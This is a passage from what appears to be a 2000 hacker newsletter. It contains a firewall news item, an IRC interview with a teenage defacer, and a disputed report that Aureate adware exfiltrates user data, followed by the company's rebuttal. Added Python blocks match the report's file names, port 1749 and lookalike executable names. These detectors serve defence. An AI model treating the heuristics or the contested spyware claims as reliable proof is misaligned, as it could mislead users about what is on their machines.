     from setting up a firewall. "Setting up a firewall is not a
     trivial thing to do," said Richard Rasmus, president and chief
     operating officer for the Huntington Beach, Calif., company.
      
      "We don't do anything to defeat or frustrate a firewall that a
     customer set up for themselves. But there is a distinction
     between that and supporting a product."
      
            The company is now in the process of evaluating
     firewall products to select one that it will support in the
     future. 
            Excite@Home has also seen the light. The
     broadband-over-cable provider signed a deal with
     McAfee to sponsor a security zone for subscribers by
     March and offer its personal firewall product to @Home's
     cable modem customers. 
            The attention to such security details could not come
     quick enough, said Gregor Freund, president of firewall
     maker Zone Labs. According to the company, attackers
     can directly access the hard drives of approximately 10
     percent of home computers without having to circumvent
     security. 
            
            "(Those users') computers are completely wide open,"
     he said. Such attacks are almost ubiquitous, he added,
     pointing out that during a 10-minute interview, six attacks
     occurred on his own company's system. 
     
            "We are a target, of course, but the bottom line is that
     people have to take responsibility for their own machines."
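
     Added example, not part of the ZDNN article or of any product it
     names: two of the three file names Crumlish found show name-based
     masquerading, a repeated executable extension (msr.exe.exe) and a
     digit-for-letter lookalike of a system file name (kerrne1.exe). The
     Python below flags both patterns; the extension sets and the list of
     known system names are assumptions, and run.exe passes untouched, so a
     name check only supplements the firewall and scanning the article
     describes.

```python
from pathlib import PureWindowsPath

# Assumption: extensions Windows runs directly, and "decoy" extensions that
# commonly sit in front of the real one (the article's case is .exe.exe).
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat"}
DECOY_EXTS = EXECUTABLE_EXTS | {".txt", ".doc", ".jpg", ".gif"}

# Assumption: a short list of well-known Windows system binary base names.
KNOWN_SYSTEM_NAMES = ("kernel32", "krnl386", "explorer",
                      "rundll32", "systray", "msgsrv32")

# Digits that are visually swapped for letters in lookalike names.
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o"})
DIGITS = "0123456789"

# File names reported in the article.
ARTICLE_NAMES = ["run.exe", "msr.exe.exe", "kerrne1.exe"]
# Constructed names for comparison (not from the article).
CONSTRUCTED_NAMES = ["explorer.exe", "kernel32.dll", "setup.v2.exe",
                     "holiday.jpg.exe", "exp1orer.exe"]


def edit_distance(a, b):
    """Levenshtein distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # deletion
                           cur[j - 1] + 1,             # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def assess(filename):
    """Return the list of name-based reasons a file looks suspicious."""
    path = PureWindowsPath(filename.lower())
    suffixes = path.suffixes
    base = path.name.split(".")[0]
    reasons = []

    # Pattern 1: an executable extension stacked on another known extension.
    if (len(suffixes) >= 2 and suffixes[-1] in EXECUTABLE_EXTS
            and suffixes[-2] in DECOY_EXTS):
        reasons.append("double-extension")

    # Pattern 2: not a known system name, but within one edit of one after
    # folding digit lookalikes. Short names are skipped to limit noise.
    if base not in KNOWN_SYSTEM_NAMES and len(base) >= 5:
        folded = base.translate(HOMOGLYPHS).rstrip(DIGITS)
        for known in KNOWN_SYSTEM_NAMES:
            if edit_distance(folded, known.rstrip(DIGITS)) <= 1:
                reasons.append("lookalike:" + known)
                break
    return reasons


def triage(names):
    """Map each flagged name to its reasons; clean names are omitted."""
    findings = {}
    for name in names:
        reasons = assess(name)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage(ARTICLE_NAMES + CONSTRUCTED_NAMES).items():
        print(name, "->", ", ".join(reasons))
```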
     
     @HWA
     
     
                         
                         
10.0 Interview with Sect0r
     ~~~~~~~~~~~~~~~~~~~~~
     
      [19:58] <sect> okay.
      <Cruciphux> hi
      [19:58] <sect> how's it going?
      <Cruciphux> i'm doing great, you??
      [19:58] <sect> pretty good.
      <Cruciphux> are you in any groups currently? and if so what do they do? if
                  not what are your current projects if any?
      <Cruciphux> >i'll jump around a wee bit here<
      [19:59] <sect> okay.
      <Cruciphux> and u can refuse to answer any questions btw, just gimme a 
                  'no comment' :)
      [19:59] <sect> well i'm with gH and i think i'm getting back in defiance.
      <Cruciphux> I heard a rumour you were 'kicked from gH' is this not true?
      [20:00] <sect> defiance is a group i was in about 8 months ago, you might
                     recall, with st0rm, ne0h, etc.
      <Cruciphux> yes
      [20:00] <sect> haha, me and most have issues now with me getting into some 
                     stuff, they aren't even really active.
      <Cruciphux> they were defacing if I remember correctly?
      [20:00] <sect> who?
      <Cruciphux> defiance? I could be mistaken.
      [20:01] <sect> yeah, we did some stuff.
      <Cruciphux> on attrition?
      <Cruciphux> was it just for kicks?
      [20:01] <sect> yes.
      [20:01] <sect> haha, you could say that.
      <Cruciphux> if i may ask how old are you?
      [20:01] <sect> about gH, me and shekk are really cool, i don't know how 
                     that's going to work out, i don't really care anymore, 
                     because gH is pretty much dead anyway, everyone knows that.
      [20:01] <sect> i'm 15.
      <Cruciphux> ok
      <Cruciphux> do you code?
      [20:01] <sect> yes.
      <Cruciphux> write your own exploits?
      [20:02] <sect> no exploits yet, i've done tools, etc.
      [20:02] <sect> i code C, pascal, and i'm working with asm now, getting more 
                     into it.
      <Cruciphux> what sort of tools? are they publicly available?
      <Cruciphux> ok
      [20:02] <sect> you might have seen the plusmail exploit recently herf found, 
                     me and ytcracker talked about that.
      <Cruciphux> may have it doesn't ring any bells.
      <Cruciphux> I saw a recent defacement that dissed you on a .mil site are you
                  aware of this defacement?
      [20:03] <sect> i wrote up a scanner, but still haven't found any differences 
                     in non-vulnerable and vulnerable sites, it just displays 
                     whether they are running the script.
      [20:03] <sect> yes i am.
      <Cruciphux> who was behind it and do you have any response to it or want to 
                  brush it off?
      [20:03] <sect> i had someone akicked from #hackers on dalnet, the kid 
                     retaliated, what can i say?
      <Cruciphux> heh
      <Cruciphux> ok
      <Cruciphux> typical irc fun
      [20:04] <sect> that would be blazinweed, he is basically a wannabe with no 
                     skills to speak of.
      <Cruciphux> he's a dalnet guy?
      [20:04] <sect> i would have re-defaced his stuff easily (nt boxen), but i'm 
                     not down with that anymore.
      [20:04] <sect> yes he is.
      <Cruciphux> what nets do you frequent most? 
      [20:04] <sect> typical :)
      [20:04] <sect> dalnet and efnet.
      [20:05] <sect> i founded #crontab on dalnet, i hang there most.
      <Cruciphux> whats behind the recent #feed-the-goats and #sesame takeovers and
                  do you still own those channels?
      [20:05] <sect> haha.
      [20:05] <sect> well.
      <Cruciphux> more politics?
      [20:05] <sect> indeed.
      [20:05] <sect> i'm usually not into that kind of stuff.
      <Cruciphux> anything you want to share i'm all ears :)
      <Cruciphux> the floor is yours
      [20:05] <sect> yeah sure.
      <Cruciphux> g/a
      [20:05] <sect> basically, eckis and bob- are script/packet kiddies.
      [20:05] <sect> hehe.
      [20:06] <sect> and bob- likes to run his mouth.
      [20:06] <sect> #sesame was started by dap, ytcracker, and myself.
      [20:06] <sect> when sSh was small.
      [20:06] <sect> bob- had NOTHING to do with it.
      [20:06] <sect> so if you think about it, that channel is rightfully mine.
      <Cruciphux> so its a personal thing mainly with bob- ?
      [20:06] <sect> yes, and eckis.
      <Cruciphux> ytcracker usually is in there or was until very recently
      <Cruciphux> he claims to be the 'new SSH'
      [20:07] <sect> yeah he chills in there.
      [20:07] <sect> there is no sSh anymore, heh.
      [20:07] <sect> ftg was on the same basis.
      <Cruciphux> hrm
      [20:07] <sect> after i received the packets, etc, heh.
      [20:07] <sect> debris approached me about that.
      <Cruciphux> yeah they 'died' a long time ago and then there was Goat Security
                  which also died, then the chan just became a place to chill
      <Cruciphux> so why bother taking it over?
      [20:07] <sect> informed him that i 'schooled' bob- on various topics, he told
                     me that he's sure i did.
      <Cruciphux> hehe
      [20:08] <sect> so debris and i spoke.
      <Cruciphux> are you and debris on good terms?
      [20:08] <sect> he asked me some asm questions to confirm what i had said about
                     my skills.
      <Cruciphux> ah
      [20:08] <sect> and i answer them all of course.
      [20:08] <sect> :)
      <Cruciphux> :)
      [20:08] <sect> anyway.
      [20:08] <sect> no, me and debris are not.
      <Cruciphux> ok
      [20:09] <sect> and i have no desire to be friends with any of them.
      <Cruciphux> does gH or defiance have a website?
      [20:09] <sect> the politics of irc doesn't concern me, i have a real life to 
                     live, know what i mean?
      [20:09] <sect> no.
      <Cruciphux> yeah man
      <Cruciphux> planning on one?
      [20:09] <sect> ummm.
      [20:09] <sect> defiance has a little site up, but i can't give that out at this
                     point.
      [20:09] <sect> private code, etc.
      <Cruciphux> ok
      <Cruciphux> will it be a hacking group, security group, coding group or whatever
                  the fuck we feel like group?
      <Cruciphux> :)
      [20:10] <sect> haha.
      [20:10] <sect> st0rm has some big plans.
      <Cruciphux> or all of the above?
      [20:10] <sect> knowing him it wont be quite legit ;D
      [20:10] <sect> well, i will release code under defiance.
      [20:11] <sect> i can't speak for the rest of the group.
      <Cruciphux> is tcpdump your own box?
      [20:11] <sect> no.
      <Cruciphux> ok
      [20:11] <sect> good friend.
      <Cruciphux> cool
      [20:11] <sect> hence the 'crontab'.
      <Cruciphux> nod
      <Cruciphux> I had something else I wanted to ask and its slipped my mind damn
      <Cruciphux> hang one sec
      <Cruciphux> (gettin old)
      <Cruciphux> :)
      [20:12] <sect> no problem.
      <Cruciphux> oh yeah, whats your view on the 'scene' in general? and what do you 
                  have to say about the new groups? or old ones for that matter, and 
                  who if anyone do you respect?
      [20:13] <sect> well.
      [20:13] <sect> the scene sucks.
      [20:13] <sect> :)
      <Cruciphux> )
      [20:13] <sect> irc politics, packeting, defacing, etc etc.
      [20:13] <sect> it's getting very old.
      [20:13] <sect> new groups?>
      [20:13] <sect> new groups? i don't think any are worth mentioning.
      <Cruciphux> I see a lot of new or fake names/groups on current web defacements for 
                  instance
      [20:14] <sect> yeah.
      [20:14] <sect> i don't like defacing in general.
      [20:14] <sect> if you find a sploit, go for it.
      <Cruciphux> I think many of those are old timers having fun and doing it 
                  anonymously when drunk etc 
      <Cruciphux> yeh
      [20:14] <sect> but i know for a fact the skilled coders out there aren't defacing.
      <Cruciphux> are you planning a career in security?
      <Cruciphux> or?
      [20:14] <sect> yes or system administration.
      <Cruciphux> nice to have an OC48+ behind you when ircing huh? *g*
      [20:15] <sect> lol.
      [20:15] <sect> indeed.
      <Cruciphux> work and play at the same time
      [20:15] <sect> yeah.
      [20:15] <sect> i mean.
      [20:15] <sect> things like defacing get you no where.
      [20:15] <sect> how does dissing someone on a defaced page prove anything?
      [20:15] <sect> nobody really cares, someone gets a laugh, moves on.
      <Cruciphux> I agree
      <Cruciphux> did you hear about the recent Fuqrag raid?
      <Cruciphux> he as raided last thursday
      [20:16] <sect> by defacing these no name pages without a message, you are doing
                     nothing.
      <Cruciphux> as=was
      [20:16] <sect> well.
      [20:16] <sect> what can i say?
      <Cruciphux> dunno, no opinion?
      [20:16] <sect> i mean, the stuff he did was pointless as well.
      [20:16] <sect> again, no message.
      <Cruciphux> he was up to more than defacing, that came secondary
      [20:16] <sect> just small government sites with little traffic.
      [20:16] <sect> well.
      [20:17] <sect> heh.
      [20:17] <sect> i only spoke with him a few times.
      <Cruciphux> hes looking at big time jail time from what i've heard of his 
                  situation from him.
      [20:17] <sect> again, this stuff gets you no where.
      <Cruciphux> nod
      <Cruciphux> ok guess that about does it unless you have anything you'd like to add,
                  like shoutouts greets fucku's etc
      [20:18] <sect> haha.
      [20:18] <sect> well.
      [20:18] <sect> i'd like to say hi to all my bros in #crontab dalnet, they're a 
                     real crew, good people.
      <Cruciphux> ok
      [20:18] <sect> and all these kids that think defacing no name sites will get you
                     somewhere, think about what you're doing, you have your whole 
                     lives ahead of you.
      [20:18] <sect> that's it from me :)
      <Cruciphux> thanks for your time, is it ok to hang in #crontab now and then?
      [20:19] <sect> yes of course ;)
      <Cruciphux> and are ya giving them chans back? :-))))))
      <Cruciphux> I found them most entertaining
      <Cruciphux> LOL
      [20:19] <sect> hehe, i don't see that happening.
      [20:19] <sect> #sesame at least.
      <Cruciphux> ok
      <Cruciphux> tnx for that interview it'll be in the next release.
      [20:20] <sect> ok take it easy.
      <Cruciphux> cya
      Session Close: Thu Feb 24 20:20:12 2000
      
      @HWA

                           
11.0 Is aureate.com spying on you?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.hardocp.com/news_images/2000/february_2000/aureatespying.html
     
     
     
     
    February 24, 2000



    Are you being spied on?

    IF this is true, I sure the hell am..

    It seems that a company named aureate.com has been secretly collecting data off
    everyone who uses applications that incorporate their banner ad software. Look at
    the below e-mail for details. Also, it's true: last night the friend that sent me
    this ran netstat -a to monitor his ports and, sure enough, while running gozilla
    and downloading something through it, aureate was in there checking out his
    machine and activities.
    
    > hi
    > this implies that even reputable sources of software, i.e., zdnet, can use
    > this for marketing purposes
    > 
    > how do we close this port or others?
    > ----- Original Message -----
    > From: "MJE" <mark@NTSHOP.NET>
    > To: <win2ksecadvice@LISTSERV.NTSECURITY.NET>
    > Sent: Wednesday, February 23, 2000 11:14 AM
    > Subject: Aureate Spies on You
    > 
    > 
    > > Forwarded from another list -- anyone know about this Aureate spying stuff?
    > > Be sure to check the list of apps that allegedly contain this code -- it's
    > > at the bottom of the message.
    > >
    > > MJE
    > >
    > >
    > >
    > > > -----Original Message-----
    > > > From: Edward (Ted) Burton [mailto:egburton@CONSULTBURTON.COM]
    > > > Sent: Monday, February 21, 2000 2:02 PM
    > > > To: Lawyers and the Internet
    > > > Cc: Craighead, Paula
    > > > Subject: [NET-LAWYERS] Aureate Spy
    > > >
    > > >
    > > > While I am not a Windows user, the following information has popped
    > > > up on the LawTech list and is of some interest to attorneys who wish
    > > > to not leave a paper trail out there on the Internet for commercial
    > > > use by others.
    > > >
    > > > According to Dale Haag, <dhaag@NOL.NET>
    > > >
    > > > The following is a listing of all software known to install the
    > > > Aureate spy on your system. The Aureate spy keeps track of your
    > > > Internet activities and sends a report to Aureate every time you open
    > > > your browser. The Aureate spy places the following files on a Windows
    > > > machine. [It is not known, yet, to affect Macintosh or Linux
    > > > machines.]
    > > >
    > > > The installed files are some or all of:
    > > >
    > > > adimage.dll
    > > > advert.dll
    > > > advpack.dll
    > > > amcis.dll
    > > > amcis2.dll
    > > > amcompat.tlb
    > > > amstream.dll
    > > > anadsc.ocx
    > > > anadscb.ocx
    > > > htmdeng.exe
    > > > ipcclient.dll
    > > > msipcsv.exe
    > > > tfde.dll
    > > >
    > > >
    > > > ========== ========== ========== ==========
    > > > Dale said:
    > > >
    > > > OK folks, living up to my reputation as a "bulldog" when I get my
    > > > teeth into something, I have been busy "reviewing" the contents and
    > > > code contained in the DLL's that Aureate makes use of. Here are a
    > > > few of my findings up to this point:
    > > >
    > > > advert.dll
    > > > =======
    > > >
    > > > This DLL creates a hidden window every time you open your browser. It
    > > > creates and sends 4 pages of information to the Aureate servers using
    > > > port 1749 on your system, these pages include:
    > > >
    > > > 1. Your name as listed in the system registry ( not the name you
    > > > installed one of the programs with )
    > > > 2. Your IP address
    > > > 3. The reverse DNS match of your address. ( tells them what ISP and
    > > > area of country you are in )
    > > > 4. A listing of ALL software that is shown in your registry as being
    > > > installed. ( Not just the companies they work with )
    > > > 5. This DLL sends the following information to their server on all
    > > > URL's you visit:
    > > > A.) ad banners you may click on
    > > > B.) all downloads you do showing the filename/file
    > > > size/date/time/type of file (image, zip, executable, etc)
    > > > C.) full time and date stamps of all your actions while using your
    > > > browser
    > > > D.) the remote dialup number you are dialing in on (taken out of
    > > > your dialer configuration)
    > > > E.) dialup password if saved, does not "appear" at first glance
    > > > to send this through to them.
    > > > 6. Contains programmers note: "Show me the money! I want to
    > > > be Mike!"
    > > >
    > > >
    > > > advpack.dll
    > > > =========
    > > >
    > > > Used during the installation only to check for other needed files.
    > > >
    > > >
    > > > amcis.dll
    > > > =======
    > > >
    > > > This DLL modifies the following registry keys:
    > > > 1. HKEY_CURRENT_CONFIG
    > > > 2. HKEY_DYN_DATA
    > > > 3. HKEY_PERFORMANCE_DATA
    > > > 4. HKEY_USERS
    > > > 5. HKEY_LOCAL_MACHINE
    > > > 6. HKEY_CURRENT_USER
    > > > 7. HKEY_CLASSES_ROOT
    > > >
    > > > Unregisters oleaut32.dll from memory as provided by M$oft and
    > > > replaces with its own calls. Switches back to M$oft's when browser is
    > > > closed. Creates stub processes to be started anytime your browser is
    > > > opened.
    > > >
    > > >
    > > > amcompat.tlb
    > > > ===========
    > > >
    > > > This guy tracks any multimedia clips ( video/pictures/sound ) that
    > > > you view. It tracks the rating level on the video/picture/sound and
    > > > title / location. Contains references to DblClick ( still digging on
    > > > this one! )
    > > >
    > > >
    > > > amstream.dll
    > > > ==========
    > > >
    > > > Sets up TWO way communications between your system and theirs.
    > > > Used to send info and receive update commands/files
    > > > Open port 1749 for communications
    > > >
    > > > ==================================================
    > > >
    > > > The programs that are known to install the Aureate spy are:
    > > >
    > > > 123Search
    > > > 3d Anarchy
    > > > 3D-FTP
    > > > 3rd block
    > > > Abe's FTP Client
    > > > Abe's Image Viewer
    > > > Abe's MP3 Finder
    > > > Abe's Picture Finder
    > > > Abe's SMB Client
    > > > Access Diver III
    > > > Acorn Email
    > > > AcqURL
    > > > ActionOutline Light 1.6
    > > > Active 'Net
    > > > Add URL
    > > > Add/Remove Plus!
    > > > Address Rover 98
    > > > Admiral VirusScanner
    > > > Advanced Call Center
    > > > Advanced Maillist Verify
    > > > AdWizard
    > > > Alive and Kicking
    > > > alphaScape QuickPaste
    > > > ASP1-A3
    > > > Auction Explorer
    > > > Aureate Group Mail
    > > > Aureate SpamKiller
    > > > AutoFTP PRO
    > > > AutoWeb
    > > > AxelCD
    > > > Beatle
    > > > Binary Boy
    > > > BinaryVortex
    > > > Blue Engine
    > > > BookSmith : Original
    > > > buddyPhone 2
    > > > Calypso E-mail
    > > > CamGrab
    > > > Capture Express 2000
    > > > Cascoly Screensaver
    > > > CDDB-Reader
    > > > CDMaster32
    > > > ChanStat
    > > > Charity Banner
    > > > Cheat Machine
    > > > Check4New
    > > > ChinMail
    > > > Clabra clipboard viewer
    > > > Classic Peg Solitaire
    > > > ComTry Music Downloader
    > > > Crystal FTP
    > > > CSE HTML Validator Lite
    > > > CuteFTP 3.0
    > > > CuteFTP 3.0
    > > > CuteFTP/Tripod
    > > > CuteMX
    > > > CutePage
    > > > Danzig Pref Engine
    > > > DateTime
    > > > Delphi Component Test
    > > > Delphi Tester
    > > > Dialer 2000
    > > > DigiBand NewsWatch
    > > > DigiCams - The WebCam Viewer
    > > > Digital Postman
    > > > DirectUpdate
    > > > DL-Mail Pro 2000
    > > > DNScape
    > > > Doorbell 1.18
    > > > Download Minder 1.5
    > > > Download Wonder
    > > > DownLoader v.1.1
    > > > Dwyco Video Conferencing
    > > > EasySeeker
    > > > EmmaSoft ChatCat
    > > > EmmaSoft dBrow
    > > > EmmaSoft KeepLan
    > > > EmmaSoft Soundz
    > > > EnvoyMail
    > > > EZ-Forms FREE
    > > > File Mag-Net
    > > > FileSplit
    > > > Folder Guard Jr.
    > > > FourTimes
    > > > Free Picture Harvester
    > > > Free Solitaire
    > > > Free Spades
    > > > Free Submitter Pro
    > > > FreeImageEditor
    > > > FreeIRC
    > > > FreeNotePad
    > > > FreeSite
    > > > FreeWebBrowser
    > > > FreeWebMail
    > > > FreeZip!
    > > > FTPEditor
    > > > GetRight
    > > > Go!Zilla
    > > > Go!Zilla WebAttack
    > > > GovernMail
    > > > Grafula
    > > > Gunther's PasswordSentry
    > > > HangWeb
    > > > hesci Private Label
    > > > HTML Translator
    > > > HTTP Proxy-Spy
    > > > Huey v1.8 Color Picker
    > > > Iban Technologies IP Tools 3.1
    > > > Idyle GimmIP
    > > > Idyle GimmIP
    > > > iFind Graphics
    > > > imageN
    > > > Infinite Patience
    > > > InfoBlast
    > > > InnovaClub
    > > > InstallZIP
    > > > Internet Tree
    > > > Internetrix
    > > > InterWebWord Companion
    > > > JetCar
    > > > JFK Research
    > > > jIRC
    > > > JOC Email Checker
    > > > JOC Web Finder
    > > > JOC Web Spider
    > > > KVT Diplom
    > > > LapLink FTP
    > > > LineSoft Download
    > > > LOL Chat
    > > > LOL Chat
    > > > Mail Them
    > > > Meracl FontMap
    > > > Meracl ImageMap Generator
    > > > Midnight Oil Solitaire
    > > > MirNik Internet Finder
    > > > More Space 99
    > > > MouseAssist
    > > > MP3 Album Finder
    > > > MP3 Fiend
    > > > MP3 Grouppie
    > > > MP3 Mag-Net
    > > > MP3 Renamer
    > > > Mp3 Stream Recorder
    > > > MP3INFO-Editor
    > > > MultiSender
    > > > Music Genie
    > > > MX Inspector BIG AD
    > > > My Genie Patriots
    > > > My Genie SE
    > > > My GetRight
    > > > NeatFTP
    > > > Net CB
    > > > Net Scan 2000
    > > > Net Vampire
    > > > Net-A-Car Feature Car Screensaver
    > > > NetAnts
    > > > NetBoard
    > > > Netbus Pro 2.10
    > > > NetCaptor 5.0
    > > > Netman Downloader
    > > > NetNak
    > > > NetSuck 3.10.5
    > > > NetTime Thingy
    > > > Network Assistant
    > > > NeuroStock
    > > > NewsBin
    > > > NewsShark
    > > > NewsWire
    > > > NfoNak
    > > > NotePads+
    > > > Notificator 1.0b
    > > > Octopus
    > > > Pattern Book
    > > > People Seek 98
    > > > Personal Search Agent
    > > > Photocopier
    > > > PicPluck
    > > > Pictures In News
    > > > Ping Thingy
    > > > PingMaster
    > > > Planet.Billboard
    > > > Planet.MP3Find
    > > > PMS
    > > > ProtectX 3
    > > > ProxyChecker
    > > > QuadSucker/Web
    > > > Quadzle Puzzles
    > > > QuikLink Autobot
    > > > QuikLink Explorer
    > > > QuikLink Explorer Gold Edition
    > > > QuoteWatch
    > > > QWallet
    > > > Real Estate Web Site Creator
    > > > Recipe Review
    > > > ReGet 1.6
    > > > Resume Detective
    > > > RingSurf
    > > > RoboCam 1.10
    > > > Rosemary's Weird Web World
    > > > SaberQuest Page Burner
    > > > SBJV
    > > > SBWcc
    > > > Scout's Game
    > > > ScreenFIRE
    > > > ScreenFIRE - FileKing
    > > > ScreenFlavors
    > > > Sea Battle
    > > > Shizzam
    > > > Simple Submit
    > > > SimpleFind
    > > > SimpleSubmit v1.0
    > > > SK-111
    > > > Smart 'n Sticky
    > > > SmartBoard 200 FREE Edition
    > > > SmartSum calculator
    > > > SonicMail
    > > > Sound Agent
    > > > Space Central Screen Saver
    > > > Splash! Siterave
    > > > StartDrive
    > > > Static FTP
    > > > StockBrowser
    > > > Subscriber
    > > > SunEdit 2K
    > > > SuperIDE
    > > > Sweep
    > > > SweepsWinner
    > > > Text Transmogrifier
    > > > The Mapper
    > > > TheNet
    > > > TI-FindMail
    > > > TIFNY
    > > > Total Finger
    > > > Total Whois
    > > > Tracking The Eye
    > > > Trade Site Creator
    > > > TWinExplorer Standard
    > > > TypeWriter 1.0
    > > > UK Phone Codes
    > > > Vagabond's Realm
    > > > VeriMP3
    > > > Vertigo QSearch
    > > > Virtual Access
    > > > Visual Cyberadio
    > > > Visual Surfer
    > > > VOG Backgammon Main
    > > > VOG Backgammon Table
    > > > VOG Chess Main
    > > > VOG Chess Table
    > > > VOG Reversi Main
    > > > VOG Reversi Table
    > > > VOG Shell
    > > > VOG Shell
    > > > VOG Shell History
    > > > W3Filer
    > > > Web Coupon
    > > > Web Page Authoring Software
    > > > Web Registrant PRO
    > > > Web Resume
    > > > Web SurfACE
    > > > WEB2SMS
    > > > WebCamVCR
    > > > WebCopier
    > > > Web-N-Force
    > > > WebSaver
    > > > Website Manager
    > > > WebStripper
    > > > WebType
    > > > WhoIs Thingy
    > > > Win A Lotto
    > > > WinEdit 2000
    > > > Word+
    > > > Wordwright
    > > > WorldChat Client
    > > > Worm
    > > > www.devgames.com
    > > > xBlock
    > > > Your ESP Test
    > > > Zion
    > > > Zip Express 2000
    > > >
    > > > _________________________________________
    > > > List Owner: Lewis Rose, lewrose@arentfox.com
    > > > Web Site: http://www.net-lawyers.org
    > > > Archives: http://eva.dc.lsoft.com/Archives/net-lawyers.html
    > > >
    > > >
    > >
    > > _____________________________________________________________________
    > > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
    > > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
    > > SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
    
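    A defender-side check for the two kinds of indicator named in the report
    above (the listed file names and port 1749), as an added example that is
    not part of the original e-mails. The netstat sample is constructed, the
    use of `netstat -an` for numeric ports is an assumption, and the note about
    stock Windows file names is an added caveat.

```python
import os

# File names listed in the forwarded report (compared case-insensitively).
REPORTED_FILES = {
    "adimage.dll", "advert.dll", "advpack.dll", "amcis.dll", "amcis2.dll",
    "amcompat.tlb", "amstream.dll", "anadsc.ocx", "anadscb.ocx",
    "htmdeng.exe", "ipcclient.dll", "msipcsv.exe", "tfde.dll",
}
# Added caveat, not from the report: these two names are also used by stock
# Windows components, so a name match alone proves nothing for them.
SHARED_WITH_WINDOWS = {"advpack.dll", "amstream.dll"}
REPORTED_PORT = 1749  # port the report says carries the traffic

# Constructed sample of Windows `netstat -an` output (addresses are made up).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1749      0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1063      203.0.113.7:1749       ESTABLISHED
  TCP    192.168.1.10:1064      198.51.100.2:80        ESTABLISHED
  UDP    192.168.1.10:137       *:*
"""


def _port(endpoint):
    """Return the numeric port of 'addr:port', or None for wildcards like '*:*'."""
    _, _, port = endpoint.rpartition(":")
    return int(port) if port.isdigit() else None


def sockets_on_port(netstat_text, port=REPORTED_PORT):
    """Return every TCP/UDP row whose local or foreign port equals `port`."""
    hits = []
    for line in netstat_text.splitlines():
        parts = line.split()
        # Skip the banner, the column header and blank lines.
        if len(parts) < 3 or parts[0].upper() not in ("TCP", "UDP"):
            continue
        local, foreign = parts[1], parts[2]
        state = parts[3] if len(parts) > 3 else ""  # UDP rows have no state
        if port in (_port(local), _port(foreign)):
            hits.append({"proto": parts[0].upper(), "local": local,
                         "foreign": foreign, "state": state})
    return hits


def find_reported_files(root):
    """Walk `root` and return (path, confidence) for each reported file name.

    confidence is "weak" for names shared with stock Windows components and
    "review" for the rest; either way the file still needs inspecting.
    """
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lowered = name.lower()
            if lowered in REPORTED_FILES:
                confidence = "weak" if lowered in SHARED_WITH_WINDOWS else "review"
                found.append((os.path.join(dirpath, name), confidence))
    return sorted(found)


if __name__ == "__main__":
    for hit in sockets_on_port(SAMPLE_NETSTAT):
        print("port %d in use: %s" % (REPORTED_PORT, hit))
    # Point this at the Windows directory of the machine being checked.
    for path, confidence in find_reported_files("."):
        print("%-6s %s" % (confidence, path))
```

    A hit on either check is a reason to look closer at the machine, not proof
    that the behaviour described in the report is taking place.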
    
     -=-
     
     Submitted by TRDonJuan: (* source not posted)
     
      Zor, this is something you might want to forward on to your readers somehow.
      
      sincerely
      
      aCiD buRn
      
      -=-
      
      Follow-up submitted by TRDonJuan (* no source), reportedly a response
      from Aureate:
      
      A variety of false rumors have been started, and we would appreciate
      your help in finding the source of these rumors so that we can clarify
      what our technology actually does and put these to rest.
      As you may already know, what Aureate Media does is work with software
      companies to make their products advertising supported. Aureate's
      technology allows for these advertisements to be delivered and displayed
      within the software products of these software products.
      
      The following concerns are those that have been brought to our
      attention. If you have additional
      concerns, please do contact us directly.
      
      Advert.dll creates a hidden window every time you open your browser
      
      This is true, but this happens because of the way that Microsoft Windows
      networking works. You will find that in running almost any Windows
      program that hidden windows are created as this is how the OS was
      designed.
      
      Advert.dll creates and sends 4 pages of information to Aureate on port
      1749
      
      We aren't sure exactly what is being referred to here. The first time
      someone installs software they are presented with an optional
      demographic survey (none of the information is required), and this
      information is sent to us one time (after the survey is completed).
      Prior to answering these questions, the user is presented with
      information explaining why we ask  these questions and how the answers
      are used. The information sent is only the information provided.
      The use of port 1749 is misleading, as again this is something built
      into the way that Microsoft
      Windows networking works. Windows will pick a high numbered port (1500+)
      in a largely random fashion. Again, this is how the OS works.
      
      Advert.dll will send your name to Aureate as it is listed in the system
      registry
      
         Completely false.
      
      Advert.dll will send your IP address to Aureate

      Your IP address is sent, again because of the way that Microsoft Windows
      networking and TCP/IP protocol works. An IP address is obviously
      required in order to communicate with an internet server in any
      instance.
      
       Advert.dll performs a reverse DNS lookup on your IP address
      
       Here again, it is Microsoft Windows networking that does this as part
      of the OS networking system.
      
      Advert.dll creates a process anytime your browser is open.
      
      This is true. This process delivers advertisements to a cache on the
      user's PC which are displayed while the software is being run. This works
      in a similar way to how the browser works, with content and images
      (including ads) being delivered to a cache on the user's PC and then
      displayed in the browser window.
      
      Advert.dll sends a list of all software listed in your registry
      
      Completely false.
      
      Advert.dll sends a list of all URL's you click on/visit
      
      Completely false.
      
      Advert.dll sends a list of all ad banners you click on
      
      Completely false. We will of course know when you click on an ad banner
      that we delivered such that we can send the user to that advertiser's web
      site in the same way that any ad network works.
      
      Advert.dll will send all downloads you perform and related information
      
      Completely false.
      
      Advert.dll will send full time and date stamps of all your actions while
      you use your browser.
      
      Completely false.
      
      Advert.dll contains the string "Show me the money! I want to be Mike!"
      
      This is true. It's a text string used by the DLL. DLLs contain many text
      strings which are used by the DLL itself. For example, if a particular
      program displayed a window which contained the text "Hello World", then
      the "Hello World" text string would be present inside that DLL.
      
      Advpack.dll (and all comments relating to it)
      
      Completely false. Advpack.dll is not one of our DLLs.
      
      Amcis.dll modifies the following registry keys: (list of keys removed)
      
      Amcis.dll will only add itself to the HKEY_CLASSES_ROOT registry key, as
      does any DLL installed on your system. It simply tells Windows where to
      find the DLLs your programs use.
      
      Amcompat.tlb (and all comments relating to it)
      
      Completely false. Amcompat.tlb is not one of our files.
      
      Amstream.dll (and all comments relating to it)
      
